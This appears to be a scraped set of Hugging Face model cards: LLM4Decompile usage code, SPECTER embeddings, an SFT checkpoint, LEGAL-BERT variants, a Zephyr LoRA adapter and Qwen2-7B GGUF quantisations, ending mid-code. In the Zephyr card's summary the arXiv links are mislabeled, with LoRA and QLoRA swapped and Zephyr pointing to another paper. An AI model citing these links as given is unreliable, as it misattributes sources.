| LLM4Decompile-End-6.7B | 0.6805 | 0.3951 | 0.3671 | 0.3720 | 0.4537 | 0.2289 | 0.1660 | 0.1618 | 0.1625 | 0.1798 |
| LLM4Decompile-End-33B | 0.5168 | 0.2956 | 0.2815 | 0.2675 | 0.3404 | 0.1886 | 0.1465 | 0.1396 | 0.1411 | 0.1540 |
### 3. How to Use
Here is an example of how to use our model (Revised for V1.5).
Note: **Replace** func0 with the function name you want to decompile.
**Preprocessing:** Compile the C code into binary, and disassemble the binary into assembly instructions.
```python
import subprocess
import os
OPT = ["O0", "O1", "O2", "O3"]
fileName = 'samples/sample' #'path/to/file'
for opt_state in OPT:
    output_file = fileName + '_' + opt_state
    input_file = fileName + '.c'
    compile_command = f'gcc -o {output_file}.o {input_file} -{opt_state} -lm'  # compile the code with GCC on Linux
    subprocess.run(compile_command, shell=True, check=True)
    compile_command = f'objdump -d {output_file}.o > {output_file}.s'  # disassemble the binary file into assembly instructions
    subprocess.run(compile_command, shell=True, check=True)
    input_asm = ''
    with open(output_file + '.s') as f:  # asm file
        asm = f.read()
        if '<' + 'func0' + '>:' not in asm:  # IMPORTANT: replace func0 with the function name
            raise ValueError("compile fails")
        asm = '<' + 'func0' + '>:' + asm.split('<' + 'func0' + '>:')[-1].split('\n\n')[0]  # IMPORTANT: replace func0 with the function name
        asm_clean = ""
        asm_sp = asm.split("\n")
        for tmp in asm_sp:
            if len(tmp.split("\t")) < 3 and '00' in tmp:
                continue
            idx = min(
                len(tmp.split("\t")) - 1, 2
            )
            tmp_asm = "\t".join(tmp.split("\t")[idx:])  # remove the binary code
            tmp_asm = tmp_asm.split("#")[0].strip()  # remove the comments
            asm_clean += tmp_asm + "\n"
    input_asm = asm_clean.strip()
    before = f"# This is the assembly code:\n"  # prompt
    after = "\n# What is the source code?\n"  # prompt
    input_asm_prompt = before + input_asm.strip() + after
    with open(fileName + '_' + opt_state + '.asm', 'w', encoding='utf-8') as f:
        f.write(input_asm_prompt)
```
**Decompilation:** Use LLM4Decompile to translate the assembly instructions into C:
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch
model_path = 'LLM4Binary/llm4decompile-1.3b-v1.5' # V1.5 Model
tokenizer = AutoTokenizer.from_pretrained(model_path)
model = AutoModelForCausalLM.from_pretrained(model_path,torch_dtype=torch.bfloat16).cuda()
with open(fileName + '_' + OPT[0] + '.asm', 'r') as f:  # optimization level O0
    asm_func = f.read()
inputs = tokenizer(asm_func, return_tensors="pt").to(model.device)
with torch.no_grad():
    outputs = model.generate(**inputs, max_new_tokens=4000)
c_func_decompile = tokenizer.decode(outputs[0][len(inputs[0]):-1])
with open(fileName + '.c', 'r') as f:  # original file
    func = f.read()
print(f'original function:\n{func}')# Note we only decompile one function, where the original file may contain multiple functions
print(f'decompiled function:\n{c_func_decompile}')
```
### 4. License
This code repository is licensed under the MIT License.
### 5. Contact
If you have any questions, please raise an issue.
|
sentence-transformers/allenai-specter | sentence-transformers | "2024-03-27T09:52:27Z" | 3,620 | 15 | sentence-transformers | [
"sentence-transformers",
"pytorch",
"tf",
"safetensors",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | sentence-similarity | "2022-03-02T23:29:05Z" | ---
license: apache-2.0
library_name: sentence-transformers
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
pipeline_tag: sentence-similarity
language:
- en
---
# allenai-specter
This model is a conversion of the [AllenAI SPECTER](https://github.com/allenai/specter) model to [sentence-transformers](https://www.SBERT.net). It can be used to map the titles & abstracts of scientific publications to a vector space such that similar papers are close.
## Usage (Sentence-Transformers)
Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:
```
pip install -U sentence-transformers
```
Then you can use the model like this:
```python
from sentence_transformers import SentenceTransformer
sentences = ["This is an example sentence", "Each sentence is converted"]
model = SentenceTransformer('sentence-transformers/allenai-specter')
embeddings = model.encode(sentences)
print(embeddings)
```
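To illustrate the paper-similarity use case, here is a sketch comparing two papers. Concatenating title and abstract with the separator token follows the usual SPECTER convention, and the example texts are made up.
```python
from sentence_transformers import SentenceTransformer, util

model = SentenceTransformer('sentence-transformers/allenai-specter')

# Hypothetical papers, formatted as "title[SEP]abstract" (assumed input convention).
sep = model.tokenizer.sep_token
papers = [
    "BERT: Pre-training of Deep Bidirectional Transformers" + sep + "We introduce a new language representation model ...",
    "Attention Is All You Need" + sep + "We propose a new network architecture, the Transformer ...",
]
embeddings = model.encode(papers, convert_to_tensor=True)
print(util.cos_sim(embeddings[0], embeddings[1]))  # higher score = more similar papers
```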
## Usage (HuggingFace Transformers)
Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: first, pass your input through the transformer model, then apply the right pooling operation on top of the contextualized word embeddings.
```python
from transformers import AutoTokenizer, AutoModel
import torch
def cls_pooling(model_output, attention_mask):
    return model_output[0][:, 0]
# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('sentence-transformers/allenai-specter')
model = AutoModel.from_pretrained('sentence-transformers/allenai-specter')
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
    model_output = model(**encoded_input)
# Perform pooling. In this case, CLS pooling.
sentence_embeddings = cls_pooling(model_output, encoded_input['attention_mask'])
print("Sentence embeddings:")
print(sentence_embeddings)
```
## Evaluation Results
For an automated evaluation of this model, see the *Sentence Embeddings Benchmark*: [https://seb.sbert.net](https://seb.sbert.net?model_name=sentence-transformers/allenai-specter)
## Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': True, 'pooling_mode_mean_tokens': False, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False})
)
```
## Citing & Authors
See [AllenAI SPECTER](https://github.com/allenai/specter) |
RLHFlow/LLaMA3-SFT | RLHFlow | "2024-05-23T14:18:57Z" | 3,620 | 5 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:2405.07863",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-05-17T12:52:45Z" | ---
library_name: transformers
tags: []
---
This is the SFT checkpoint used for the project [Online-RLHF](https://github.com/RLHFlow/Online-RLHF). Also check our [technical report here](https://arxiv.org/pdf/2405.07863).
The model is trained from [meta-llama/Meta-Llama-3-8B](https://huggingface.co/meta-llama/Meta-Llama-3-8B) on a mixture of diverse, high-quality open-source data for 1 epoch; detailed parameters are given in the report. It has not been trained with RLHF and can serve as a good starting point for RLHF research.
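A minimal loading and generation sketch; whether the checkpoint ships a chat template, plus the dtype and sampling settings, are assumptions.
```python
# Minimal sketch for trying the SFT checkpoint; the settings below are assumptions.
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

model_id = "RLHFlow/LLaMA3-SFT"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.bfloat16, device_map="auto")

messages = [{"role": "user", "content": "What is an SFT checkpoint?"}]
prompt = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=128)
print(tokenizer.decode(output[0][inputs.input_ids.shape[1]:], skip_special_tokens=True))
```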
|
nlpaueb/bert-base-uncased-contracts | nlpaueb | "2022-04-28T14:43:56Z" | 3,619 | 18 | transformers | [
"transformers",
"pytorch",
"tf",
"jax",
"bert",
"legal",
"fill-mask",
"en",
"license:cc-by-sa-4.0",
"endpoints_compatible",
"region:us"
] | fill-mask | "2022-03-02T23:29:05Z" | ---
language: en
pipeline_tag: fill-mask
license: cc-by-sa-4.0
thumbnail: https://i.ibb.co/p3kQ7Rw/Screenshot-2020-10-06-at-12-16-36-PM.png
tags:
- legal
widget:
- text: "This [MASK] Agreement is between General Motors and John Murray."
---
# LEGAL-BERT: The Muppets straight out of Law School
<img align="left" src="https://i.ibb.co/p3kQ7Rw/Screenshot-2020-10-06-at-12-16-36-PM.png" width="100"/>
LEGAL-BERT is a family of BERT models for the legal domain, intended to assist legal NLP research, computational law, and legal technology applications. To pre-train the different variations of LEGAL-BERT, we collected 12 GB of diverse English legal text from several fields (e.g., legislation, court cases, contracts) scraped from publicly available resources. Sub-domain variants (CONTRACTS-, EURLEX-, ECHR-) and/or general LEGAL-BERT perform better than using BERT out of the box for domain-specific tasks.<br>
This is the sub-domain variant pre-trained on US contracts.
<br/><br/>
---
I. Chalkidis, M. Fergadiotis, P. Malakasiotis, N. Aletras and I. Androutsopoulos. "LEGAL-BERT: The Muppets straight out of Law School". In Findings of Empirical Methods in Natural Language Processing (EMNLP 2020) (Short Papers), to be held online, 2020. (https://aclanthology.org/2020.findings-emnlp.261)
---
## Pre-training corpora
The pre-training corpora of LEGAL-BERT include:
* 116,062 documents of EU legislation, publicly available from EURLEX (http://eur-lex.europa.eu), the repository of EU Law running under the EU Publication Office.
* 61,826 documents of UK legislation, publicly available from the UK legislation portal (http://www.legislation.gov.uk).
* 19,867 cases from the European Court of Justice (ECJ), also available from EURLEX.
* 12,554 cases from HUDOC, the repository of the European Court of Human Rights (ECHR) (http://hudoc.echr.coe.int/eng).
* 164,141 cases from various courts across the USA, hosted in the Case Law Access Project portal (https://case.law).
* 76,366 US contracts from EDGAR, the database of US Securities and Exchange Commission (SECOM) (https://www.sec.gov/edgar.shtml).
## Pre-training details
* We trained BERT using the official code provided in Google BERT's GitHub repository (https://github.com/google-research/bert).
* We released a model similar to the English BERT-BASE model (12-layer, 768-hidden, 12-heads, 110M parameters).
* We chose to follow the same training set-up: 1 million training steps with batches of 256 sequences of length 512 with an initial learning rate 1e-4.
* We were able to use a single Google Cloud TPU v3-8 provided for free from [TensorFlow Research Cloud (TFRC)](https://www.tensorflow.org/tfrc), while also utilizing [GCP research credits](https://edu.google.com/programs/credits/research). Huge thanks to both Google programs for supporting us!
## Models list
| Model name | Model Path | Training corpora |
| ------------------- | ------------------------------------ | ------------------- |
| CONTRACTS-BERT-BASE | `nlpaueb/bert-base-uncased-contracts` | US contracts |
| EURLEX-BERT-BASE | `nlpaueb/bert-base-uncased-eurlex` | EU legislation |
| ECHR-BERT-BASE | `nlpaueb/bert-base-uncased-echr` | ECHR cases |
| LEGAL-BERT-BASE * | `nlpaueb/legal-bert-base-uncased` | All |
| LEGAL-BERT-SMALL | `nlpaueb/legal-bert-small-uncased` | All |
\* LEGAL-BERT-BASE is the model referred to as LEGAL-BERT-SC in Chalkidis et al. (2020); a model trained from scratch on the legal corpora listed above, using a newly created vocabulary from a sentence-piece tokenizer trained on the very same corpora.
\*\* As many of you expressed interest in the LEGAL-BERT-FP models (those relying on the original BERT-BASE checkpoint), they have been released in Archive.org (https://archive.org/details/legal_bert_fp), as these models are secondary and possibly only interesting for those who aim to dig deeper in the open questions of Chalkidis et al. (2020).
## Load Pretrained Model
```python
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained("nlpaueb/bert-base-uncased-contracts")
model = AutoModel.from_pretrained("nlpaueb/bert-base-uncased-contracts")
```
## Use LEGAL-BERT variants as Language Models
| Corpus | Model | Masked token | Predictions |
| --------------------------------- | ---------------------------------- | ------------ | ------------ |
| | **BERT-BASE-UNCASED** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('new', '0.09'), ('current', '0.04'), ('proposed', '0.03'), ('marketing', '0.03'), ('joint', '0.02')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('torture', '0.32'), ('rape', '0.22'), ('abuse', '0.14'), ('death', '0.04'), ('violence', '0.03')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('farm', '0.25'), ('livestock', '0.08'), ('draft', '0.06'), ('domestic', '0.05'), ('wild', '0.05')
| | **CONTRACTS-BERT-BASE** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('letter', '0.38'), ('dealer', '0.04'), ('employment', '0.03'), ('award', '0.03'), ('contribution', '0.02')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('death', '0.39'), ('imprisonment', '0.07'), ('contempt', '0.05'), ('being', '0.03'), ('crime', '0.02')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('domestic', '0.18'), ('laboratory', '0.07'), ('household', '0.06'), ('personal', '0.06'), ('the', '0.04')
| | **EURLEX-BERT-BASE** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('supply', '0.11'), ('cooperation', '0.08'), ('service', '0.07'), ('licence', '0.07'), ('distribution', '0.05')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('torture', '0.66'), ('death', '0.07'), ('imprisonment', '0.07'), ('murder', '0.04'), ('rape', '0.02')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('live', '0.43'), ('pet', '0.28'), ('certain', '0.05'), ('fur', '0.03'), ('the', '0.02')
| | **ECHR-BERT-BASE** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('second', '0.24'), ('latter', '0.10'), ('draft', '0.05'), ('bilateral', '0.05'), ('arbitration', '0.04')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('torture', '0.99'), ('death', '0.01'), ('inhuman', '0.00'), ('beating', '0.00'), ('rape', '0.00')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('pet', '0.17'), ('all', '0.12'), ('slaughtered', '0.10'), ('domestic', '0.07'), ('individual', '0.05')
| | **LEGAL-BERT-BASE** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('settlement', '0.26'), ('letter', '0.23'), ('dealer', '0.04'), ('master', '0.02'), ('supplemental', '0.02')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('torture', '1.00'), ('detention', '0.00'), ('arrest', '0.00'), ('rape', '0.00'), ('death', '0.00')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('live', '0.67'), ('beef', '0.17'), ('farm', '0.03'), ('pet', '0.02'), ('dairy', '0.01')
| | **LEGAL-BERT-SMALL** |
| (Contracts) | This [MASK] Agreement is between General Motors and John Murray . | employment | ('license', '0.09'), ('transition', '0.08'), ('settlement', '0.04'), ('consent', '0.03'), ('letter', '0.03')
| (ECHR) | The applicant submitted that her husband was subjected to treatment amounting to [MASK] whilst in the custody of Adana Security Directorate | torture | ('torture', '0.59'), ('pain', '0.05'), ('ptsd', '0.05'), ('death', '0.02'), ('tuberculosis', '0.02')
| (EURLEX) | Establishing a system for the identification and registration of [MASK] animals and regarding the labelling of beef and beef products . | bovine | ('all', '0.08'), ('live', '0.07'), ('certain', '0.07'), ('the', '0.07'), ('farm', '0.05')
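Predictions like the ones in the table above can be reproduced with a standard fill-mask pipeline; a minimal sketch (scores may differ slightly from the table):
```python
from transformers import pipeline

fill_mask = pipeline("fill-mask", model="nlpaueb/bert-base-uncased-contracts")
predictions = fill_mask("This [MASK] Agreement is between General Motors and John Murray.")
for p in predictions:
    print(p["token_str"], round(p["score"], 2))
```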
## Evaluation on downstream tasks
Consider the experiments in the article "LEGAL-BERT: The Muppets straight out of Law School". Chalkidis et al., 2020, (https://aclanthology.org/2020.findings-emnlp.261)
## Author - Publication
```
@inproceedings{chalkidis-etal-2020-legal,
title = "{LEGAL}-{BERT}: The Muppets straight out of Law School",
author = "Chalkidis, Ilias and
Fergadiotis, Manos and
Malakasiotis, Prodromos and
Aletras, Nikolaos and
Androutsopoulos, Ion",
booktitle = "Findings of the Association for Computational Linguistics: EMNLP 2020",
month = nov,
year = "2020",
address = "Online",
publisher = "Association for Computational Linguistics",
doi = "10.18653/v1/2020.findings-emnlp.261",
pages = "2898--2904"
}
```
## About Us
[AUEB's Natural Language Processing Group](http://nlp.cs.aueb.gr) develops algorithms, models, and systems that allow computers to process and generate natural language texts.
The group's current research interests include:
* question answering systems for databases, ontologies, document collections, and the Web, especially biomedical question answering,
* natural language generation from databases and ontologies, especially Semantic Web ontologies,
* text classification, including filtering spam and abusive content,
* information extraction and opinion mining, including legal text analytics and sentiment analysis,
* natural language processing tools for Greek, for example parsers and named-entity recognizers,
* machine learning in natural language processing, especially deep learning.
The group is part of the Information Processing Laboratory of the Department of Informatics of the Athens University of Economics and Business.
[Ilias Chalkidis](https://iliaschalkidis.github.io) on behalf of [AUEB's Natural Language Processing Group](http://nlp.cs.aueb.gr)
| Github: [@ilias.chalkidis](https://github.com/iliaschalkidis) | Twitter: [@KiddoThe2B](https://twitter.com/KiddoThe2B) |
|
typeof/zephyr-7b-beta-lora | typeof | "2024-05-25T14:16:49Z" | 3,619 | 4 | peft | [
"peft",
"safetensors",
"Δ",
"LoRA",
"text-generation",
"en",
"arxiv:2305.18290",
"arxiv:2310.16944",
"arxiv:2305.14314",
"arxiv:2106.09685",
"base_model:mistralai/Mistral-7B-v0.1",
"region:us"
] | text-generation | "2023-11-20T18:12:54Z" | ---
library_name: peft
base_model: mistralai/Mistral-7B-v0.1
language:
- en
pipeline_tag: text-generation
widget:
- text: "How many helicopters can a human eat in one sitting?"
tags:
- Δ
- LoRA
---
<!--
# Model Card for Model ID
-->
## Model Details
<!---->
$$
W_{mistral} + LoRA_{zephyr} = W_{zephyr} \\
W_{zephyr} - LoRA_{zephyr} = W_{mistral}
$$
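A sketch of materializing the first identity above with `peft`, i.e. adding the LoRA delta to the Mistral base weights; this is an illustration, not an official recipe from this card.
```python
# Minimal sketch: W_mistral + LoRA_zephyr -> W_zephyr via peft's merge_and_unload().
from transformers import AutoModelForCausalLM
from peft import PeftModel

base = AutoModelForCausalLM.from_pretrained("mistralai/Mistral-7B-v0.1")
lora = PeftModel.from_pretrained(base, "typeof/zephyr-7b-beta-lora")
merged = lora.merge_and_unload()          # fold the LoRA delta into the base weights
merged.save_pretrained("zephyr-7b-beta-reconstructed")  # hypothetical output directory
```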
<!--
$$ W_{mistral} + LoRA_{zephyr} = W_{zephyr} $$
```
typeof/zephyr-7b-beta-lora + mistralai/Mistral-7B-v0.1
= HuggingFaceH4/zephyr-7b-beta
````
### Model Description
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
### Direct Use
[More Information Needed]
### Downstream Use [optional]
[More Information Needed]
### Out-of-Scope Use
[More Information Needed]
## Bias, Risks, and Limitations
[More Information Needed]
### Recommendations
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
-->
### Model Sources
[HuggingFaceH4/zephyr-7b-beta](https://huggingface.co/HuggingFaceH4/zephyr-7b-beta)
## How to Get Started with the Model
Use the code below to get started with the model.
```python
# pip install transformers peft
import torch
from transformers import pipeline, AutoModelForCausalLM, AutoTokenizer
model_id = "mistralai/Mistral-7B-v0.1"
peft_model_id = "typeof/zephyr-7b-beta-lora"
model = AutoModelForCausalLM.from_pretrained(model_id)
model.load_adapter(peft_model_id)
tokenizer_id = "HuggingFaceH4/zephyr-7b-beta" # for chat template etc...
tokenizer = AutoTokenizer.from_pretrained(tokenizer_id)
pipe = pipeline("text-generation", model=model, tokenizer=tokenizer)
messages = [
{
"role": "system",
"content": "You are a friendly chatbot who always responds in the style of a pirate",
},
{"role": "user", "content": "How many helicopters can a human eat in one sitting?"},
]
prompt = pipe.tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
outputs = pipe(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
```
```
<|system|>
You are a friendly chatbot who always responds in the style of a pirate</s>
<|user|>
How many helicopters can a human eat in one sitting?</s>
<|assistant|>
Well, me matey, that’s a good question indeed! I’ve never seen
a human eat a helicopter, and I don’t think many others have
either. However, I’ve heard rumors that some people have
eaten entire airplanes, so I suppose it’s not entirely unheard
of.
As for the number of helicopters one could eat, that depends
on the size and weight of the helicopter. A small, lightweight
helicopter would be easier to eat than a large, heavy one.
In fact, I’ve heard that some people have eaten entire helicopters
as part of a dare or a challenge.
So, my advice to you, me hearty, is to steer clear of helicopters
and stick to more traditional fare. Yarr!</s>
```
<!--
## Training Details
### Training Data
[More Information Needed]
### Training Procedure
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
#### Speeds, Sizes, Times [optional]
[More Information Needed]
## Evaluation
### Testing Data, Factors & Metrics
#### Testing Data
[More Information Needed]
#### Factors
[More Information Needed]
#### Metrics
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
[More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
[More Information Needed]
## More Information
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
## Training procedure
The following `bitsandbytes` quantization config was used during training:
- quant_method: bitsandbytes
- load_in_4bit: True
- bnb_4bit_quant_type: nf4
- bnb_4bit_use_double_quant: True
### Framework versions
- PEFT 0.6.3.dev0
-->
#### Summary
[Zephyr-7B-β](https://arxiv.org/abs/2305.18290) is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1)
[Zephyr-7B technical report](https://arxiv.org/abs/2310.16944)
[LoRA](https://arxiv.org/abs/2305.14314)
[QLoRA](https://arxiv.org/abs/2106.09685) |
RichardErkhov/Qwen_-_Qwen2-7B-gguf | RichardErkhov | "2024-06-14T18:44:01Z" | 3,619 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-14T18:14:47Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
Qwen2-7B - GGUF
- Model creator: https://huggingface.co/Qwen/
- Original model: https://huggingface.co/Qwen/Qwen2-7B/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [Qwen2-7B.Q2_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q2_K.gguf) | Q2_K | 2.81GB |
| [Qwen2-7B.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.IQ3_XS.gguf) | IQ3_XS | 3.12GB |
| [Qwen2-7B.IQ3_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.IQ3_S.gguf) | IQ3_S | 3.26GB |
| [Qwen2-7B.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q3_K_S.gguf) | Q3_K_S | 3.25GB |
| [Qwen2-7B.IQ3_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.IQ3_M.gguf) | IQ3_M | 3.33GB |
| [Qwen2-7B.Q3_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q3_K.gguf) | Q3_K | 3.55GB |
| [Qwen2-7B.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q3_K_M.gguf) | Q3_K_M | 3.55GB |
| [Qwen2-7B.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q3_K_L.gguf) | Q3_K_L | 3.81GB |
| [Qwen2-7B.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.IQ4_XS.gguf) | IQ4_XS | 3.96GB |
| [Qwen2-7B.Q4_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q4_0.gguf) | Q4_0 | 4.13GB |
| [Qwen2-7B.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.IQ4_NL.gguf) | IQ4_NL | 4.16GB |
| [Qwen2-7B.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q4_K_S.gguf) | Q4_K_S | 4.15GB |
| [Qwen2-7B.Q4_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q4_K.gguf) | Q4_K | 4.36GB |
| [Qwen2-7B.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q4_K_M.gguf) | Q4_K_M | 4.36GB |
| [Qwen2-7B.Q4_1.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q4_1.gguf) | Q4_1 | 4.54GB |
| [Qwen2-7B.Q5_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q5_0.gguf) | Q5_0 | 4.95GB |
| [Qwen2-7B.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q5_K_S.gguf) | Q5_K_S | 4.95GB |
| [Qwen2-7B.Q5_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q5_K.gguf) | Q5_K | 5.07GB |
| [Qwen2-7B.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q5_K_M.gguf) | Q5_K_M | 5.07GB |
| [Qwen2-7B.Q5_1.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q5_1.gguf) | Q5_1 | 5.36GB |
| [Qwen2-7B.Q6_K.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q6_K.gguf) | Q6_K | 5.82GB |
| [Qwen2-7B.Q8_0.gguf](https://huggingface.co/RichardErkhov/Qwen_-_Qwen2-7B-gguf/blob/main/Qwen2-7B.Q8_0.gguf) | Q8_0 | 7.54GB |
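A minimal sketch of fetching one of the quantised files above and running it locally with `llama-cpp-python` (the chosen quant, context size, and prompt are only examples; any file from the table works the same way):
```python
# pip install huggingface_hub llama-cpp-python
from huggingface_hub import hf_hub_download
from llama_cpp import Llama

# Download a single quant instead of cloning the whole repo
model_path = hf_hub_download(
    repo_id="RichardErkhov/Qwen_-_Qwen2-7B-gguf",
    filename="Qwen2-7B.Q4_K_M.gguf",  # reasonable speed/quality trade-off per the table above
)

# Qwen2-7B is a base model, so plain completion (no chat template) is used here
llm = Llama(model_path=model_path, n_ctx=4096)
result = llm("Artificial intelligence is", max_tokens=64, temperature=0.7)
print(result["choices"][0]["text"])
```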
Original model description:
---
language:
- en
pipeline_tag: text-generation
tags:
- pretrained
license: apache-2.0
---
# Qwen2-7B
## Introduction
Qwen2 is the new series of Qwen large language models. For Qwen2, we release a number of base language models and instruction-tuned language models ranging from 0.5 to 72 billion parameters, including a Mixture-of-Experts model. This repo contains the 7B Qwen2 base language model.
Compared with state-of-the-art open-source language models, including the previously released Qwen1.5, Qwen2 has generally surpassed most open-source models and demonstrated competitiveness against proprietary models across a series of benchmarks targeting language understanding, language generation, multilingual capability, coding, mathematics, reasoning, etc.
For more details, please refer to our [blog](https://qwenlm.github.io/blog/qwen2/), [GitHub](https://github.com/QwenLM/Qwen2), and [Documentation](https://qwen.readthedocs.io/en/latest/).
<br>
## Model Details
Qwen2 is a language model series including decoder language models of different model sizes. For each size, we release the base language model and the aligned chat model. It is based on the Transformer architecture with SwiGLU activation, attention QKV bias, group query attention, etc. Additionally, we have an improved tokenizer that adapts to multiple natural languages and code.
## Requirements
The code for Qwen2 is included in the latest Hugging Face `transformers`, and we advise you to install `transformers>=4.37.0`, or you might encounter the following error:
```
KeyError: 'qwen2'
```
## Usage
We do not advise you to use base language models for text generation. Instead, you can apply post-training, e.g., SFT, RLHF, continued pretraining, etc., on this model.
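For completeness, a hedged sketch of loading the base model with `transformers` (assuming `transformers>=4.37.0` and `accelerate` are installed; the prompt is arbitrary and only serves as a sanity check, since the base model is meant for further post-training rather than end-user generation):
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "Qwen/Qwen2-7B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(
    model_id,
    torch_dtype=torch.bfloat16,
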